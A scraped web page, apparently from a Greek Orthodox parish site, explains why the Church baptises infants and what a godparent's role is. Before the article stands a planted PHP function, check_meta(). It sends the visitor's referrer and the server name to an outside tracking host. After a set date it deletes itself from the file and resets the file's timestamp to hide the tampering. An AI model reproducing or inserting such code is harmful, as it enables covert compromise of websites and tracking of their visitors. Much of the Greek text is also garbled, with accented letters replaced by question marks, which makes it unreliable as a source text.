check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456732960){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=8&id=18776828&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_search/models/content.php"); } Η Βάπτιση. Μυστήριο της Εκκλησίας. Για τον Ανάδοχο
 
 
Η Βάπτιση. Μυστήριο της Εκκλησίας. Για τον Ανάδοχο Εκτύπωση E-mail
Ευρετήριο Άρθρου
Η Βάπτιση. Μυστήριο της Εκκλησίας. Για τον Ανάδοχο
Ο ρόλος του αναδόχου
Ακολουθία της Κατηχήσεως
Το Σύμβολον της Πίστεως
Πρακτικές επισημάνσεις
Δικαιολογητικά
Δείτε το έντυπο
Όλες οι Σελίδες

ΓΙΑΤΙ Ο ΝΗΠΙΟΒΑΠΤΙΣΜΟΣ

? ?κκλησία ?πό τά πρ?τα βήματά της μαζί μέ τό βάπτισμα τ?ν ?νηλίκων υ?οθέτησε καί τόν νηπιοβαπτισμό, δηλαδή τό βάπτισμα τ?ν νηπίων καί μικρ?ν παιδι?ν. Τήν ?ρχαία α?­τή παράδοση συνεχίζει μέχρι σήμερα. Γιά ποιούς λόγους;

Πρ?τον, γιατί δέν θέλει νά στερήσει ?κόμη καί τά νήπια ?πό τή λυτρωτική χάρη το? μυστηρίου το? Βαπτίσματος.
Καί δεύτερον, γιατί τά νήπια πού βαπτίζει ε?ναι παιδιά χριστιαν?ν γονέων, μελ?ν τ?ς ?κκλησίας. Ο? χριστιανοί γονε?ς ε?ναι α?τοί πού τά προσκομίζουν μέ τή θέλη­σή τους στήν ?κκλησία καί τ?ς ζητο?ν νά τά βαπτίσει.

?πως ο? γονε?ς, πού φέρνουν ?να παιδί στόν κόσμο, ?ποφασίζουν γιά ?,τι ?φορ? τό παιδί τους μέχρι πού νά ?νηλικιωθε? (χωρίς νά ζητο?ν προηγουμένως τή συγκατάθεσή του), ?ποβλέποντας στό συμφέρον το? παιδιο? τους, ?τσι καί ο? ?διοι, ?ντας ?ρθόδοξοι χριστιανοί, ?ποφασίζουν νά τό βαπτίσουν καί νά τό καταστήσουν μέλος τ?ς ?κκλησί­ας.

Καί ?πειδή ?κριβ?ς τό νήπιο δέν μπορε? νά συγκατατεθε? καί δέν ?χει ?πίγνωση τ?ς ση­μασίας το? γεγονότος που τελε?ται, ? ?κκλησία ?ξιώνει ?πό τούς χριστιανούς γονε?ς το? νηπίου καί ?πό τόν ?νάδοχό του νά ?ναλάβουν τήν α?τονόητη ε?θύνη νά ?ναθρέ­ψουν τό παιδί χριστιανικά.

Τό Βάπτισμα ?ταν ?χει τελεστε? κανονικά (δηλαδή ?πό λειτουργό πού ?χει κανονική ?ε­ρωσύνη καί σύμφωνα μέ τούς θεμελιώδεις λειτουργικούς τύπους) δέν ?παναλαμβάνε­ται. ?στω κι ?ν ? ?νθρωπος ?πομακρύνθηκε ?πό τόν Θεό. ?στω κι ?ν ?πέπεσε σέ βα­ρύτατα ?μαρτήματα. ?τσι, ? ?ναβαπτισμός ?παγορεύεται α?στηρά. ? βαπτισματική χάρη πού λαμβάνει ? πιστός παραμένει ?νεξάλειπτη, γιατί τά δ?ρα πού δίνει ? Θεός στόν ?νθρωπο δέν τά παίρνει ποτέ πίσω. ?μως, ?σο ? ?νθρωπος παραμένει μακριά ?­πό τόν Θεό, ?ποκομμένος ?πό τήν ε?λογημένη ζωή τ?ς ?κκλησίας, ? χάρη το? μυ­στηρίου μένει ?νενεργός.


?γαπητέ ?νάδοχε,

?ποδέχτηκες τήν τιμή πού σο? ?καναν δύο ?δελφοί μας χριστιανοί γονε?ς, νά γίνεις ? ?νάδοχος το? παιδιο? τους.

? ρόλος το? ?ναδόχου δέν ?χει ?πλ?ς κοινωνικό χαρα­κτήρα. Πρωτίστως ?χει πνευματικό καί ο?σιαστικό.

? ?νάδοχος ?πωμίζεται τήν ε?θύνη -μαζί, φυσικά, μέ τούς χριστιανούς γονε?ς το? παιδιο?- νά μεταλαμπαδεύσει στόν νεο­φώτιστο χριστιανό τή χριστιανική πίστη. Νά τόν ?δηγήσει, καθώς θά μεγαλώνει, στή συνειδητή χριστιανική ζωή.